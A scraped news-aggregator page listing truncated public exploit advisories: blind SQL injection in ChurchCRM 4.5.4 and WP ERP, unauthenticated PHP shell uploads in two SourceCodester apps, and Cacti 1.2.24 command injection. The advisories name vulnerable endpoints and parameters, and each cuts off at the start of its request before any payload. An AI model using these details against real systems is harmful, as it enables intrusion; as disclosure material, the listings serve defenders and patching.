comparemela.com

Latest Breaking News On - Vendor homepage - Page 1 : comparemela.com

ChurchCRM 4 5 4 SQL Injection - KizzMyAnthia com

# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN tyid# Date: 03-05-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.4# Tested on: Windows, Linux# CVE: CVE-2023-29842"""The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN tyid POST parameter.This endpoint can be triggered through the

WordPress WP ERP 1 12 2 SQL Injection - KizzMyAnthia com

Zoo Management System 1 0 Shell Upload - KizzMyAnthia com

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE# Date: 16.10.2023# Exploit Author: Çağatay Ceyhan# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google vignette# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database# Version: 1.0# Tested on: Windows 11## Unauthenticated users can access /zoomanagementsystem/admin/public html/save animal address and they can upload malicious php file instead of animal picture image without any authentication.POST /zoomanagementsystem/admin/public html/save animal HTTP/1.1Host: localhostContent-Length: 6162Cache-Control: max-age=0sec-ch-ua: "Chromium";v="117",

Clinic s Patient Management System 1 0 Shell Upload

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE# Date: 07.10.2023# Exploit Author: Oğulcan Hami Gül# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code# Version: 1.0# Tested on: Windows 10## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.curl -i -s -k -X

Cacti 1 2 24 Command Injection - KizzMyAnthia com

# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options# Date: 2023-07-03# Exploit Author: Antonio Francesco Sardella# Vendor Homepage: https://www.cacti.net/# Software Link: https://www.cacti.net/info/downloads# Version: Cacti 1.2.24# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container# CVE: CVE-2023-39362# Category: WebApps# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application# Vulnerability discovered and reported by:

© 2024 Vimarsana

vimarsana © 2020. All Rights Reserved.